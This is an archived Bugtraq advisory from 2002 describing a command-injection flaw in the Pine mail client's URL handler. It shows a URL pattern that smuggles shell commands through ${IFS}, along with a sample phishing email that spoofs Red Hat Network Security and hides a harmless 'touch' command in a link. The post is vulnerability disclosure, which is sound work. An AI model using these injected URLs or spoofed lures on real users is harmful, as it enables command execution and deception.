Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Pine 4.33 (at least) URL handler allows embedded commands.

From: zen-parse <zen-parse () gmx net>
Date: Sat, 5 Jan 2002 15:17:16 +1300 (NZDT)
Systems:                Pine 4.33 (under Redhat 7.0)
                        (Probably many others, haven't checked much)

Vendors notified:       Sat, 20 Oct 2001 06:50:12 +1300 (NZDT)
And again:              Fri, 9 Nov 2001 07:14:15 +1300 (NZDT)
And again:              Thu, 3 Jan 2002 08:15:55 +1300 (NZDT)

Problem:                URL handler allows embedded commands.
                        May allow email viruses of the Outlook kind.

Severity:               Extremely Low -> Very High (Dependant on current 
                        email reading habits)

Workaround:             Don't view URLs from inside Pine. 
                        (ObSpam: Except for http://mp3.com/cosv/ ;])

Details:

 This is a similar problem to the xchat 1.4.1 URL handler vulnerability.
 http://www.securityfocus.com/bid/1601


 In Pine, if a user selects a URL for the form 

  http://address/'&/some/program${IFS}with${IFS}arguments&&apos;

 and URL handlers are installed, they will end up with the browser open
 on 

  http://address/

 and 

  /some/program with arguments

 will get executed.

 If you are reading your email as root these these commands will execute as
 root. (Create an alias for root to a non-privileged user instead of
 reading mail as root.)

 If you are reading your email as a non-privileged user, the impact is
 somewhat lower, although local exploits could be run on the computer, or
 Outlook style email viruses could be executed.

 If you don't view links given to you in Pine, the impact from this
 problem is non-existant.

 It is possible to obfuscate the URL by putting it in an HTML message
 such as the following.

----Begin html email----
From: Redhat Network Security <rhnsecurity () redhat com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Message-ID: <Pine.LNX.4.33.0110221213510.9618-200000@clarity.local>
MIME-Version: 1.0
Content-Type: TEXT/html
Content-ID: <Pine.LNX.4.33.0110221214120.9618@clarity.local>
Content-Length: 389
Lines: 12

<HTML>
<BODY>
Urgent update:<p>
PINE allows execution of arbitrary commands.<p>

<a 
href="http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/';touch${IFS}/tmp/zen.was.here;'/";>
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/</a>
<p>

This link contains PINE update information. <p>

You are advised to perform this immediately. <p>

The link also contains other urgent update information. <p>

</BODY>
</HTML>
----End html email----


Which would appear something like
----Begin view of email----

Date: Mon, 22 Oct 2001 13:34:40 +1300
From: Redhat Network Security <rhnsecurity () redhat com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE

Urgent update:

PINE allows execution of arbitrary commands.

http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/ho
e-in-pine-url-handler/

This link contains PINE update information.

You are advised to perform this immediately.

The link also contains other urgent update information.

----End view of email----


 When this link is selected to follow, Pine changes the status/menu lines
 to read:

View selected URL "http://updates.redhat.com/update_information/urgent/r..."; ?  
Y [Yes]                   U editURL                                             
N No                      A editApp              

 Which appears to match the url in the email. This probably makes detection
 of this kind of exploit attempt harder. 

 -- zen-parse

[ A (relatively) safe way to visit http://mp3.com/cosv is to type the
  address into the address bar of the browser you are using. Contrary to a
  rumour posted several days ago, the only way I get any money from this
  site is through CD purchases. If you want to, visit the site and listen
  to the music. If you like it, you might want to buy it, or not. I hope
  nobody has any illusion of being tricked into visiting. ]


-- 
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.  
If this message was posted by zen-parse () gmx net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.
Previous By Date Next
Previous By Thread Next

Current thread: